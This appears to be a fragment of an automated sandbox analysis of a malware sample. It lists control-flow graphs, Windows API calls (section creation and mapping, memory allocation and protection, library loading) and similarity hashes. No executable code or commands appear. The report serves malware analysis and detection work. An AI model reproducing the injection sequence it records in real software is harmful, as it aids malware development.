                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E51F9B5900249BFEB208F91CC48FAF7BB8FF85B10F104169FA11BA2E5D6749941CB24
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 346 4015bc-4015e3 call 40120e 351 4015e5 346->351 352 4015e8-4015ed 346->352 351->352 354 401913-40191b 352->354 355 4015f3-401604 352->355 354->352 358 401920-401966 call 40120e 354->358 359 401911 355->359 360 40160a-401633 355->360 359->358 360->359 367 401639-401650 NtDuplicateObject 360->367 367->359 369 401656-40167a NtCreateSection 367->369 372 4016d6-4016fc NtCreateSection 369->372 373 40167c-40169d NtMapViewOfSection 369->373 372->359 376 401702-401706 372->376 373->372 375 40169f-4016bb NtMapViewOfSection 373->375 375->372 378 4016bd-4016d3 375->378 376->359 379 40170c-40172d NtMapViewOfSection 376->379 378->372 379->359 381 401733-40174f NtMapViewOfSection 379->381 381->359 384 401755 call 40175a 381->384
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577791765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 72661907227a9452eb25ab953c02bdcf5a827517e06e297a0d085dc110f4c5bf
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 765dedf92b6036aea99e2596c7c6646b0bcbba97602321f23575c560d9e65fb8
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72661907227a9452eb25ab953c02bdcf5a827517e06e297a0d085dc110f4c5bf
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1451E8B5900249BFEF208F91CC48FDF7BB8FF85B10F104169FA11AA2A5D6749945CB64
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 386 4015cb-4015e3 call 40120e 392 4015e5 386->392 393 4015e8-4015ed 386->393 392->393 395 401913-40191b 393->395 396 4015f3-401604 393->396 395->393 399 401920-401966 call 40120e 395->399 400 401911 396->400 401 40160a-401633 396->401 400->399 401->400 408 401639-401650 NtDuplicateObject 401->408 408->400 410 401656-40167a NtCreateSection 408->410 413 4016d6-4016fc NtCreateSection 410->413 414 40167c-40169d NtMapViewOfSection 410->414 413->400 417 401702-401706 413->417 414->413 416 40169f-4016bb NtMapViewOfSection 414->416 416->413 419 4016bd-4016d3 416->419 417->400 420 40170c-40172d NtMapViewOfSection 417->420 419->413 420->400 422 401733-40174f NtMapViewOfSection 420->422 422->400 425 401755 call 40175a 422->425
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577791765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 004f83838c091370c792dd4fcb680897e20f1790ca1ffba750393c7614aa26f8
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 60f1a669064b898f2f8cfe764b4cdaf5e199705ebcb5ef48edc51869d28594cd
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 004f83838c091370c792dd4fcb680897e20f1790ca1ffba750393c7614aa26f8
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C51FAB1900249BFEF208F91CC48F9FBBB8FF85B10F104169FA11AA2A5D7749941CB24
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 0 42e6b0-42e6f0 2 42e6f4-42e6f9 0->2 3 42e70b-42e715 2->3 4 42e6fb-42e707 2->4 5 42e717-42e760 3->5 6 42e764-42e769 3->6 4->3 5->6 7 42e782-42e78c 6->7 8 42e76b-42e773 6->8 7->2 12 42e792 7->12 8->7 11 42e775-42e780 8->11 11->7 13 42e794-42e79b 11->13 14 42e7c8-42e7d2 12->14 13->14 18 42e79d-42e7c0 13->18 16 42ea70-42ea7e 14->16 17 42e7d8-42e828 14->17 19 42ea80-42ea86 16->19 49 42e837-42e963 17->49 50 42e82a-42e834 17->50 18->14 22 42ea93-42ea9d 19->22 23 42ea88-42ea8d 19->23 25 42ea9f-42eab8 22->25 26 42eabc-42eac3 22->26 23->22 25->26 26->19 30 42eac5-42eae1 GlobalAlloc 26->30 32 42eae7-42eaf3 30->32 33 42eb7e-42eb89 30->33 34 42eaf9-42eafe 32->34 35 42eb90-42eb93 33->35 37 42eb00-42eb3f 34->37 38 42eb46-42eb53 call 42e130 34->38 39 42eb95-42ebb5 35->39 40 42ebba-42ebbb 35->40 37->38 53 42eb75-42eb78 38->53 54 42eb55-42eb70 38->54 39->40 40->35 42 42ebbd-42ebcd 40->42 47 42ebd0-42ebdb 42->47 51 42ebe6-42ebe7 47->51 52 42ebdd-42ebe1 47->52 110 42e977-42e9da 49->110 111 42e965-42e974 49->111 50->49 51->47 58 42ebe9-42ec0d call 42e080 call 42e440 51->58 52->51 53->33 53->34 54->53 69 42ec10-42ec1a 58->69 70 42ec24-42ec32 GlobalFlags LocalSize 69->70 71 42ec1c-42ec20 69->71 73 42ec34-42ec39 70->73 74 42ec3f-42ec46 70->74 71->70 73->74 74->69 75 42ec48-42ec5d LoadLibraryA 74->75 77 42ed53-42ed6a 75->77 78 42ec63-42ed48 75->78 78->77 112 42ea27-42ea6d 110->112 113 42e9dc-42e9e0 110->113 111->110 112->16 114 42e9e2-42e9f1 113->114 115 42ea1e-42ea24 113->115 121 42e9f3-42e9f6 114->121 122 42e9fc-42ea12 114->122 115->112 121->122 123 42e9f8-42e9f9 121->123 122->115 125 42ea14-42ea1a 122->125 123->122 125->115
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNELBASE(00000000,007BC964), ref: 0042EACD
                                                                                                                                                                                                                                                                                                                  • GlobalFlags.KERNEL32(00000000), ref: 0042EC26
                                                                                                                                                                                                                                                                                                                  • LocalSize.KERNEL32(00000000), ref: 0042EC2A
                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNELBASE(004042A8), ref: 0042EC4D
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577926327.000000000042E000.00000020.00000001.01000000.00000005.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_42e000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Global$AllocFlagsLibraryLoadLocalSize
                                                                                                                                                                                                                                                                                                                  • String ID: (H7$XH@$lH@
                                                                                                                                                                                                                                                                                                                  • API String ID: 2181924483-3656395101
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 92610714a21dda742868bf2367f4e4ef561245d9dc16923959ff5e1a89e67b5b
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8099c32e484168f09429c500e39e6e70eb2455f7c22bec5011dac1a35774a5f5
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92610714a21dda742868bf2367f4e4ef561245d9dc16923959ff5e1a89e67b5b
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B02B5B1604380ABE320EBA1DD85F5B77E4FB84704F50493EF689A72D1DB786844CB5A
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 126 230003c-2300047 127 2300049 126->127 128 230004c-2300263 call 2300a3f call 2300e0f call 2300d90 VirtualAlloc 126->128 127->128 143 2300265-2300289 call 2300a69 128->143 144 230028b-2300292 128->144 149 23002ce-23003c2 VirtualProtect call 2300cce call 2300ce7 143->149 146 23002a1-23002b0 144->146 148 23002b2-23002cc 146->148 146->149 148->146 155 23003d1-23003e0 149->155 156 23003e2-2300437 call 2300ce7 155->156 157 2300439-23004b8 VirtualFree 155->157 156->155 159 23005f4-23005fe 157->159 160 23004be-23004cd 157->160 163 2300604-230060d 159->163 164 230077f-2300789 159->164 162 23004d3-23004dd 160->162 162->159 166 23004e3-2300505 162->166 163->164 169 2300613-2300637 163->169 167 23007a6-23007b0 164->167 168 230078b-23007a3 164->168 178 2300517-2300520 166->178 179 2300507-2300515 166->179 170 23007b6-23007cb 167->170 171 230086e-23008be LoadLibraryA 167->171 168->167 172 230063e-2300648 169->172 174 23007d2-23007d5 170->174 177 23008c7-23008f9 171->177 172->164 175 230064e-230065a 172->175 180 2300824-2300833 174->180 181 23007d7-23007e0 174->181 175->164 176 2300660-230066a 175->176 182 230067a-2300689 176->182 184 2300902-230091d 177->184 185 23008fb-2300901 177->185 186 2300526-2300547 178->186 179->186 183 2300839-230083c 180->183 187 23007e2 181->187 188 23007e4-2300822 181->188 189 2300750-230077a 182->189 190 230068f-23006b2 182->190 183->171 191 230083e-2300847 183->191 185->184 192 230054d-2300550 186->192 187->180 188->174 189->172 195 23006b4-23006ed 190->195 196 23006ef-23006fc 190->196 197 2300849 191->197 198 230084b-230086c 191->198 193 23005e0-23005ef 192->193 194 2300556-230056b 192->194 193->162 200 230056d 194->200 201 230056f-230057a 194->201 195->196 202 230074b 196->202 203 23006fe-2300748 196->203 197->171 198->183 200->193 204 230059b-23005bb 201->204 205 230057c-2300599 201->205 202->182 203->202 210 23005bd-23005db 204->210 205->210 210->192
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0230024D
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2580124237.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_2300000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                  • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 746ef3dcb69f921d4488a693262606992e45043278dd64e5b9135942425a71bd
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80526B74A01229DFDB64CF58C994BACBBB5BF09304F1480D9E54DAB391DB30AA95CF24
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 427 7fde38-7fde51 428 7fde53-7fde55 427->428 429 7fde5c-7fde68 CreateToolhelp32Snapshot 428->429 430 7fde57 428->430 431 7fde6a-7fde70 429->431 432 7fde78-7fde85 Module32First 429->432 430->429 431->432 437 7fde72-7fde76 431->437 433 7fde8e-7fde96 432->433 434 7fde87-7fde88 call 7fdaf7 432->434 438 7fde8d 434->438 437->428 437->432 438->433
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007FDE60
                                                                                                                                                                                                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 007FDE80
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2579756154.00000000007F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 007F8000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7f8000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 82b48bab428d8c0ffd4b9d99454c7487dc45dcb6d3facf183a1cda74aebe34ea
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BDF0C2321003186BD7303BB8988CB7F76E9AF68720F100528E752D51C0DB74EC058661
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 440 2300e0f-2300e24 SetErrorMode * 2 441 2300e26 440->441 442 2300e2b-2300e2c 440->442 441->442
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000400,?,?,02300223,?,?), ref: 02300E19
                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000000,?,?,02300223,?,?), ref: 02300E1E
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2580124237.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_2300000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 834bfec238e9a65a1cf45a95de28566e7cf1e366da0b19ee1e3b597b2ccced10
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67D0123114512877D7002A94DC09BCD7B1CDF05B66F008011FB0DE9080C770954046E5
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 443 4029ba-4029c3 444 4029d3 443->444 445 4029ca-4029cf 443->445 444->445 446 4029d6-402a0b call 40120e 444->446 445->446 455 402a0f-402a1d LdrLoadDll 446->455 456 402a26-402a71 call 40120e 455->456 457 402a1f 455->457 457->456
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577791765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8b4368bb53e1649655da800b8e3771367f61da053ffbe47dde7c34dc5595736a
                                                                                                                                                                                                                                                                                                                  • Instruction ID: ddfd821467dba8d9e3be05996510f596060048204c77d2b9bdf6330f9e046059
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b4368bb53e1649655da800b8e3771367f61da053ffbe47dde7c34dc5595736a
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C11E571708104E7D6209A449B4EF6B3724AB50B00F308077E5077A1C0D9FD9A07BBAF
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 469 4029c5-402a0b call 40120e 480 402a0f-402a1d LdrLoadDll 469->480 481 402a26-402a71 call 40120e 480->481 482 402a1f 480->482 482->481
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577791765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 630f67e63f4c9d6cadc1f4ef28869250e9dd95ac73f78134dda1cef590dfe083
                                                                                                                                                                                                                                                                                                                  • Instruction ID: eda82e36109819710fc28ef01b941f30aa1b457bd77d6c907d6690057fca41fa
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 630f67e63f4c9d6cadc1f4ef28869250e9dd95ac73f78134dda1cef590dfe083
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C01C471708205E7DA60DA949A4EB6B7710AB51B10F308077E5037A1C4DAFD9A07FB6B
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 494 4029d1-4029d3 496 4029d6-402a0b call 40120e 494->496 497 4029ca-4029cf 494->497 506 402a0f-402a1d LdrLoadDll 496->506 497->496 507 402a26-402a71 call 40120e 506->507 508 402a1f 506->508 508->507
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577791765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8aebd7c2dfb35844096bdf04bcf18f9291abc38b44631a4f8f553a04b448b611
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 27f311fed6bd4bb195386d6e886048742e5b6b48a655c0a394e70793ed6bf28f
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8aebd7c2dfb35844096bdf04bcf18f9291abc38b44631a4f8f553a04b448b611
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E0018071708105E7DA609A449B4EB6B7324BB50B10F308477E5077A1C4DAFD9A07BB6F
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 520 40d8ac-40d8b6 521 40d8d3-40d8dc 520->521 522 40d8b8-40d8c2 520->522 524 40d8de 521->524 525 40d8df-40d8e4 521->525 522->521 523 40d8c4-40d8d2 522->523 524->525 526 40d8e6-40d8f7 RtlAllocateHeap 525->526 527 40d8f9-40d900 525->527 526->527 529 40d92b-40d92d 526->529 530 40d902-40d90b call 40de36 527->530 531 40d91e-40d923 527->531 530->525 535 40d90d-40d912 530->535 531->529 532 40d925 531->532 532->529 536 40d914 535->536 537 40d91a-40d91c 535->537 536->537 537->529
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0040B13A,?,?,00000000), ref: 0040D8EF
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577926327.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_40b000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: a94024be4463f28e86786baba5d25b388673a66689faf64f83668a8d1ab9a822
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 32653bed96846e10ed93f98ad81b9e01bfccb852d110e1386259c0f7a325a759
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a94024be4463f28e86786baba5d25b388673a66689faf64f83668a8d1ab9a822
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1501DD36A012159AEB28AFA5DC04B673395AF81364F00853BE816EB2D0DB38DC058748
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 538 4029d5-402a0b call 40120e 546 402a0f-402a1d LdrLoadDll 538->546 547 402a26-402a71 call 40120e 546->547 548 402a1f 546->548 548->547
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577791765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 14f9d75437b26c4e33ab762a249f6d4a6897a4cf10a17b4738070ea496484bd2
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6c082c2f6db60d75b034223dafbed04b71575a1e0537fab93527f59567f6cb96
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14f9d75437b26c4e33ab762a249f6d4a6897a4cf10a17b4738070ea496484bd2
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB01B531708105E7DB60DA409A4DF5F7720BB50B10F208577E5077A1C4DAF99A17EB9B
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
